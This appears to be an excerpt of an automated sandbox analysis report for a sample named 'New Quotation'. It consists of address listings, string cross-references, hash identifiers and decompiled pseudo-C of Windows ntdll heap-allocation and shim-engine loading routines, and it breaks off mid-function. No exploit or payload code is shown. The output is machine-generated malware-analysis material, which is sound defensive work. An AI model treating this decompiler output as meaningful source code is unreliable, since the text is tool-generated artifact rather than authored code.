                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed842
                                                                                                                                                                                          0x1d7ed955
                                                                                                                                                                                          0x1d7ed95a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed95a
                                                                                                                                                                                          0x1d8392ee
                                                                                                                                                                                          0x1d8392f2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8392f8
                                                                                                                                                                                          0x1d8392fb
                                                                                                                                                                                          0x1d839301
                                                                                                                                                                                          0x1d83931f
                                                                                                                                                                                          0x1d839321
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839327
                                                                                                                                                                                          0x1d839327
                                                                                                                                                                                          0x1d83932c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83932c
                                                                                                                                                                                          0x1d839306
                                                                                                                                                                                          0x1d839313
                                                                                                                                                                                          0x1d83931c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83931c
                                                                                                                                                                                          0x1d839315
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839315
                                                                                                                                                                                          0x1d839308
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839308
                                                                                                                                                                                          0x1d7ed866
                                                                                                                                                                                          0x1d7ed869
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed872
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed872
                                                                                                                                                                                          0x1d7ed835
                                                                                                                                                                                          0x1d7ed838
                                                                                                                                                                                          0x1d839366
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839366
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed838
                                                                                                                                                                                          0x1d7ed830
                                                                                                                                                                                          0x1d7ed7ad
                                                                                                                                                                                          0x1d83917f
                                                                                                                                                                                          0x1d83917f
                                                                                                                                                                                          0x1d7ed7b3
                                                                                                                                                                                          0x1d7ed7b8
                                                                                                                                                                                          0x1d839188
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839194
                                                                                                                                                                                          0x1d8391a5
                                                                                                                                                                                          0x1d8391ac
                                                                                                                                                                                          0x1d8391ae
                                                                                                                                                                                          0x1d8391b0
                                                                                                                                                                                          0x1d8391b7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8391bd
                                                                                                                                                                                          0x1d8391bd
                                                                                                                                                                                          0x1d8391c8
                                                                                                                                                                                          0x1d8391ca
                                                                                                                                                                                          0x1d8391d7
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8391e5
                                                                                                                                                                                          0x1d8391e6
                                                                                                                                                                                          0x1d8391ec
                                                                                                                                                                                          0x1d8391f0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8391f2
                                                                                                                                                                                          0x1d7ed7be
                                                                                                                                                                                          0x1d7ed7be
                                                                                                                                                                                          0x1d7ed7c2
                                                                                                                                                                                          0x1d7ed7c5
                                                                                                                                                                                          0x1d8391f7
                                                                                                                                                                                          0x1d8391fa
                                                                                                                                                                                          0x1d8391fe
                                                                                                                                                                                          0x1d839213
                                                                                                                                                                                          0x1d839216
                                                                                                                                                                                          0x1d83921a
                                                                                                                                                                                          0x1d83921d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83921f
                                                                                                                                                                                          0x1d839224
                                                                                                                                                                                          0x1d7ed805
                                                                                                                                                                                          0x1d7ed807
                                                                                                                                                                                          0x1d839231
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d839237
                                                                                                                                                                                          0x1d83923d
                                                                                                                                                                                          0x1d839244
                                                                                                                                                                                          0x1d83924e
                                                                                                                                                                                          0x1d839254
                                                                                                                                                                                          0x1d83925c
                                                                                                                                                                                          0x1d839261
                                                                                                                                                                                          0x1d839261
                                                                                                                                                                                          0x1d83925c
                                                                                                                                                                                          0x1d83926d
                                                                                                                                                                                          0x1d83926f
                                                                                                                                                                                          0x1d839274
                                                                                                                                                                                          0x1d839286
                                                                                                                                                                                          0x1d839299
                                                                                                                                                                                          0x1d83929f
                                                                                                                                                                                          0x1d8392a1
                                                                                                                                                                                          0x1d8392aa
                                                                                                                                                                                          0x1d8392ae
                                                                                                                                                                                          0x1d8392b0
                                                                                                                                                                                          0x1d8392b0
                                                                                                                                                                                          0x1d8392ae
                                                                                                                                                                                          0x1d839274
                                                                                                                                                                                          0x1d8392b6
                                                                                                                                                                                          0x1d8392d9
                                                                                                                                                                                          0x1d8392d9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8392b6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed807
                                                                                                                                                                                          0x1d7ed7cb
                                                                                                                                                                                          0x1d7ed7d9
                                                                                                                                                                                          0x1d7ed7e0
                                                                                                                                                                                          0x1d7ed7e7
                                                                                                                                                                                          0x1d7ed7ee
                                                                                                                                                                                          0x1d7ed7fb
                                                                                                                                                                                          0x1d7ed800
                                                                                                                                                                                          0x1d7ed803
                                                                                                                                                                                          0x1d7ed803
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed7b8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed790
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7ed902
                                                                                                                                                                                          0x1d7ed6fb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D839178
                                                                                                                                                                                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 1D83914E, 1D839173
                                                                                                                                                                                          • GsHd, xrefs: 1D7ED794
                                                                                                                                                                                          • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1D839372
                                                                                                                                                                                          • Actx , xrefs: 1D839315
                                                                                                                                                                                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1D839153
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                                                                                                                                                          • API String ID: 3446177414-2196497285
                                                                                                                                                                                          • Opcode ID: d9212c6f9b32d9ec22d6ac71aec9db4c002abb7a12868cbba956ab23e851eb68
                                                                                                                                                                                          • Instruction ID: 4036cfae106490241809d9fefbb62c4a52d8e4ab657873461a747c2b80352f3f
                                                                                                                                                                                          • Opcode Fuzzy Hash: d9212c6f9b32d9ec22d6ac71aec9db4c002abb7a12868cbba956ab23e851eb68
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9DE1AE706083429FD701CF1CC880B6AB7E5BF88768F044A2EF9999B291D771E845CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D87F0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                          			E1D87F0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x1d8ad320);
				E1D827BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E1D7C7662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E1D87F3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E1D7CB910();
						} else {
							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E1D7CB910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E1D7DFED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E1D880835(_t188, 0);
						_t184 = E1D7E5D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E1D880D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E1D88D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E1D803AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = E1D7FFDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E1D880835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x1d8c47c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x1d8c47c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x1d8c47c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E1D87823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E1D7CB910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E1D7CB910();
								} else {
									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E1D7CB910("Just allocated block at %p for %Ix bytes\n",  *0x1d8c47c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x1d8c47a1 = 1;
									 *0x1d8c4100 = 0;
									asm("int3");
									 *0x1d8c47a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x1d8c3748; // 0x0
					 *0x1d8c91e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                                                                                                                                                          0x1d87f0a5
                                                                                                                                                                                          0x1d87f0a7
                                                                                                                                                                                          0x1d87f0ac
                                                                                                                                                                                          0x1d87f0b3
                                                                                                                                                                                          0x1d87f0b5
                                                                                                                                                                                          0x1d87f0ba
                                                                                                                                                                                          0x1d87f0bd
                                                                                                                                                                                          0x1d87f0c7
                                                                                                                                                                                          0x1d87f0e3
                                                                                                                                                                                          0x1d87f0e6
                                                                                                                                                                                          0x1d87f0f4
                                                                                                                                                                                          0x1d87f0f9
                                                                                                                                                                                          0x1d87f0fb
                                                                                                                                                                                          0x1d87f3d2
                                                                                                                                                                                          0x1d87f3d2
                                                                                                                                                                                          0x1d87f3d5
                                                                                                                                                                                          0x1d87f3d5
                                                                                                                                                                                          0x1d87f3d8
                                                                                                                                                                                          0x1d87f3df
                                                                                                                                                                                          0x1d87f3e4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f3e4
                                                                                                                                                                                          0x1d87f104
                                                                                                                                                                                          0x1d87f106
                                                                                                                                                                                          0x1d87f10b
                                                                                                                                                                                          0x1d87f111
                                                                                                                                                                                          0x1d87f114
                                                                                                                                                                                          0x1d87f117
                                                                                                                                                                                          0x1d87f119
                                                                                                                                                                                          0x1d87f11c
                                                                                                                                                                                          0x1d87f11e
                                                                                                                                                                                          0x1d87f11e
                                                                                                                                                                                          0x1d87f12e
                                                                                                                                                                                          0x1d87f134
                                                                                                                                                                                          0x1d87f137
                                                                                                                                                                                          0x1d87f13b
                                                                                                                                                                                          0x1d87f13b
                                                                                                                                                                                          0x1d87f13c
                                                                                                                                                                                          0x1d87f13f
                                                                                                                                                                                          0x1d87f142
                                                                                                                                                                                          0x1d87f144
                                                                                                                                                                                          0x1d87f350
                                                                                                                                                                                          0x1d87f350
                                                                                                                                                                                          0x1d87f356
                                                                                                                                                                                          0x1d87f359
                                                                                                                                                                                          0x1d87f378
                                                                                                                                                                                          0x1d87f37d
                                                                                                                                                                                          0x1d87f35b
                                                                                                                                                                                          0x1d87f370
                                                                                                                                                                                          0x1d87f375
                                                                                                                                                                                          0x1d87f383
                                                                                                                                                                                          0x1d87f38e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f14a
                                                                                                                                                                                          0x1d87f14a
                                                                                                                                                                                          0x1d87f14d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f153
                                                                                                                                                                                          0x1d87f156
                                                                                                                                                                                          0x1d87f15e
                                                                                                                                                                                          0x1d87f163
                                                                                                                                                                                          0x1d87f16a
                                                                                                                                                                                          0x1d87f16a
                                                                                                                                                                                          0x1d87f170
                                                                                                                                                                                          0x1d87f170
                                                                                                                                                                                          0x1d87f177
                                                                                                                                                                                          0x1d87f186
                                                                                                                                                                                          0x1d87f188
                                                                                                                                                                                          0x1d87f18b
                                                                                                                                                                                          0x1d87f18f
                                                                                                                                                                                          0x1d87f194
                                                                                                                                                                                          0x1d87f196
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f19c
                                                                                                                                                                                          0x1d87f19c
                                                                                                                                                                                          0x1d87f19f
                                                                                                                                                                                          0x1d87f1a3
                                                                                                                                                                                          0x1d87f1ac
                                                                                                                                                                                          0x1d87f1ac
                                                                                                                                                                                          0x1d87f1ac
                                                                                                                                                                                          0x1d87f1ae
                                                                                                                                                                                          0x1d87f1b0
                                                                                                                                                                                          0x1d87f1b3
                                                                                                                                                                                          0x1d87f1b6
                                                                                                                                                                                          0x1d87f1bb
                                                                                                                                                                                          0x1d87f1c5
                                                                                                                                                                                          0x1d87f1c8
                                                                                                                                                                                          0x1d87f1ca
                                                                                                                                                                                          0x1d87f1cb
                                                                                                                                                                                          0x1d87f1cf
                                                                                                                                                                                          0x1d87f1cf
                                                                                                                                                                                          0x1d87f1c8
                                                                                                                                                                                          0x1d87f1d4
                                                                                                                                                                                          0x1d87f1d8
                                                                                                                                                                                          0x1d87f208
                                                                                                                                                                                          0x1d87f20b
                                                                                                                                                                                          0x1d87f20e
                                                                                                                                                                                          0x1d87f1da
                                                                                                                                                                                          0x1d87f1dc
                                                                                                                                                                                          0x1d87f1e1
                                                                                                                                                                                          0x1d87f1e6
                                                                                                                                                                                          0x1d87f1ed
                                                                                                                                                                                          0x1d87f1ff
                                                                                                                                                                                          0x1d87f1ef
                                                                                                                                                                                          0x1d87f1f0
                                                                                                                                                                                          0x1d87f1f5
                                                                                                                                                                                          0x1d87f1f8
                                                                                                                                                                                          0x1d87f1fb
                                                                                                                                                                                          0x1d87f1fb
                                                                                                                                                                                          0x1d87f202
                                                                                                                                                                                          0x1d87f202
                                                                                                                                                                                          0x1d87f202
                                                                                                                                                                                          0x1d87f211
                                                                                                                                                                                          0x1d87f214
                                                                                                                                                                                          0x1d87f218
                                                                                                                                                                                          0x1d87f21b
                                                                                                                                                                                          0x1d87f227
                                                                                                                                                                                          0x1d87f22d
                                                                                                                                                                                          0x1d87f22d
                                                                                                                                                                                          0x1d87f22d
                                                                                                                                                                                          0x1d87f22f
                                                                                                                                                                                          0x1d87f236
                                                                                                                                                                                          0x1d87f238
                                                                                                                                                                                          0x1d87f23c
                                                                                                                                                                                          0x1d87f23c
                                                                                                                                                                                          0x1d87f244
                                                                                                                                                                                          0x1d87f24a
                                                                                                                                                                                          0x1d87f250
                                                                                                                                                                                          0x1d87f2be
                                                                                                                                                                                          0x1d87f2c1
                                                                                                                                                                                          0x1d87f2c4
                                                                                                                                                                                          0x1d87f2c9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f2cf
                                                                                                                                                                                          0x1d87f2d2
                                                                                                                                                                                          0x1d87f2d5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f2db
                                                                                                                                                                                          0x1d87f2e2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f2ec
                                                                                                                                                                                          0x1d87f2f3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f2f9
                                                                                                                                                                                          0x1d87f2ff
                                                                                                                                                                                          0x1d87f302
                                                                                                                                                                                          0x1d87f321
                                                                                                                                                                                          0x1d87f326
                                                                                                                                                                                          0x1d87f304
                                                                                                                                                                                          0x1d87f319
                                                                                                                                                                                          0x1d87f31e
                                                                                                                                                                                          0x1d87f337
                                                                                                                                                                                          0x1d87f338
                                                                                                                                                                                          0x1d87f343
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f252
                                                                                                                                                                                          0x1d87f252
                                                                                                                                                                                          0x1d87f255
                                                                                                                                                                                          0x1d87f274
                                                                                                                                                                                          0x1d87f279
                                                                                                                                                                                          0x1d87f257
                                                                                                                                                                                          0x1d87f26c
                                                                                                                                                                                          0x1d87f271
                                                                                                                                                                                          0x1d87f27f
                                                                                                                                                                                          0x1d87f28d
                                                                                                                                                                                          0x1d87f295
                                                                                                                                                                                          0x1d87f295
                                                                                                                                                                                          0x1d87f29b
                                                                                                                                                                                          0x1d87f29f
                                                                                                                                                                                          0x1d87f2a5
                                                                                                                                                                                          0x1d87f2ac
                                                                                                                                                                                          0x1d87f2b2
                                                                                                                                                                                          0x1d87f2b3
                                                                                                                                                                                          0x1d87f2b3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d87f29f
                                                                                                                                                                                          0x1d87f250
                                                                                                                                                                                          0x1d87f196
                                                                                                                                                                                          0x1d87f0c9
                                                                                                                                                                                          0x1d87f0ce
                                                                                                                                                                                          0x1d87f0d6
                                                                                                                                                                                          0x1d87f0dc
                                                                                                                                                                                          0x1d87f3e7
                                                                                                                                                                                          0x1d87f3ea
                                                                                                                                                                                          0x1d87f3f6
                                                                                                                                                                                          0x1d87f3f6

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                          • API String ID: 3446177414-1745908468
                                                                                                                                                                                          • Opcode ID: cbeef8f05c629a38f8816311321a324fee4abff850b859db46ce4d388d40490c
                                                                                                                                                                                          • Instruction ID: 73196920437d279aa9a587c306c3e17864d3f64ebe1af485a87410147e368457
                                                                                                                                                                                          • Opcode Fuzzy Hash: cbeef8f05c629a38f8816311321a324fee4abff850b859db46ce4d388d40490c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 95912636908649DFCB02CFA9D840BEDBBF2FF49720F15805AE5459B262C735A941DB12
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7C640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 46%
                                                                                                                                                                                          			E1D7C640D(void* __ecx) {
				signed int _v8;
				void* _v12;
				void* _v536;
				void* _v548;
				char _v780;
				char* _v784;
				char _v788;
				char _v792;
				intOrPtr _v804;
				char _v868;
				char* _v872;
				short _v874;
				char _v876;
				void* _v880;
				char _v892;
				void* _v896;
				void* _v900;
				void* _v904;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t48;
				short _t49;
				void* _t52;
				signed char _t61;
				void* _t67;
				intOrPtr _t71;
				void* _t81;
				signed char _t85;
				void* _t99;
				void* _t100;
				void* _t102;
				void* _t103;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				void* _t109;

				_t108 = (_t106 & 0xfffffff8) - 0x374;
				_v8 =  *0x1d8cb370 ^ _t108;
				_t48 = 0x16;
				_v876 = _t48;
				_t96 =  &_v876;
				_t49 = 0x18;
				_v874 = _t49;
				_t99 = __ecx;
				_v872 = L"apphelp.dll";
				_v784 =  &_v780;
				_v788 = 0x1000000;
				_v780 = 0;
				_t52 = E1D7C6C11( &_v788,  &_v876, _t109);
				if(_t52 < 0) {
					_t85 =  *0x1d8c37c0; // 0x0
					__eflags = _t85 & 0x00000003;
					if((_t85 & 0x00000003) == 0) {
						L12:
						__eflags = _t85 & 0x00000010;
						L15:
						if(__eflags != 0) {
							asm("int3");
						}
						L6:
						_t53 =  &_v780;
						if( &_v780 != _v784) {
							_t53 = E1D7CBA80(_v784);
						}
						_pop(_t100);
						_pop(_t102);
						_pop(_t81);
						return E1D814B50(_t53, _t81, _v8 ^ _t108, _t96, _t100, _t102);
					}
					_push(_t52);
					_push("Building shim engine DLL system32 filename failed with status 0x%08lx\n");
					_push(0);
					_push("LdrpInitShimEngine");
					_push(0xa35);
					L11:
					_push("minkernel\\ntdll\\ldrinit.c");
					E1D84E692();
					_t85 =  *0x1d8c37c0; // 0x0
					_t108 = _t108 + 0x18;
					goto L12;
				}
				E1D7EE8A6(0, 0x4001,  &_v868);
				_t96 =  &_v872;
				_t103 = E1D7C6B45( &_v792,  &_v872, 0,  &_v892);
				if(_v804 != 0) {
					E1D7FE7E0( &_v792, _v868);
				}
				_t112 = _t103;
				if(_t103 < 0) {
					_t61 =  *0x1d8c37c0; // 0x0
					__eflags = _t61 & 0x00000003;
					if((_t61 & 0x00000003) != 0) {
						E1D84E692("minkernel\\ntdll\\ldrinit.c", 0xa48, "LdrpInitShimEngine", 0, "Loading the shim engine DLL failed with status 0x%08lx\n", _t103);
						_t61 =  *0x1d8c37c0; // 0x0
						_t108 = _t108 + 0x18;
					}
					__eflags = _t61 & 0x00000010;
					goto L15;
				} else {
					 *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) =  *( *((intOrPtr*)(_t108 + 0xc)) + 0x34) | 0x00000100;
					 *0x1d8c5d64 =  *((intOrPtr*)( *((intOrPtr*)(_t108 + 0xc)) + 0x18));
					E1D807DF6( *((intOrPtr*)(_t108 + 0xc)));
					E1D7ED3E1(0,  *((intOrPtr*)(_t108 + 0xc)), _t103);
					_t67 = E1D7C6868( *((intOrPtr*)(_t108 + 0xc)), _t96, _t112);
					if(_t67 < 0) {
						_t85 =  *0x1d8c37c0; // 0x0
						__eflags = _t85 & 0x00000003;
						if((_t85 & 0x00000003) == 0) {
							goto L12;
						}
						_push(_t67);
						_push("Getting the shim engine exports failed with status 0x%08lx\n");
						_push(0);
						_push("LdrpInitShimEngine");
						_push(0xa56);
						goto L11;
					}
					_t104 =  *0x1d8c9208; // 0x0
					_v872 = _t108 + 0x178;
					_v876 = 0x2000000;
					_t96 =  *0x7ffe0330;
					_t71 =  *0x1d8c5b24; // 0x18e2b68
					asm("ror esi, cl");
					 *0x1d8c91e0( &_v876, _t71 + 0x24, _t99, 0x20);
					if( *(_t104 ^  *0x7ffe0330)() >= 0) {
						E1D7C6565( *((intOrPtr*)(_t108 + 0x14)));
						if( *((intOrPtr*)(_t108 + 0x14)) != _t108 + 0x178) {
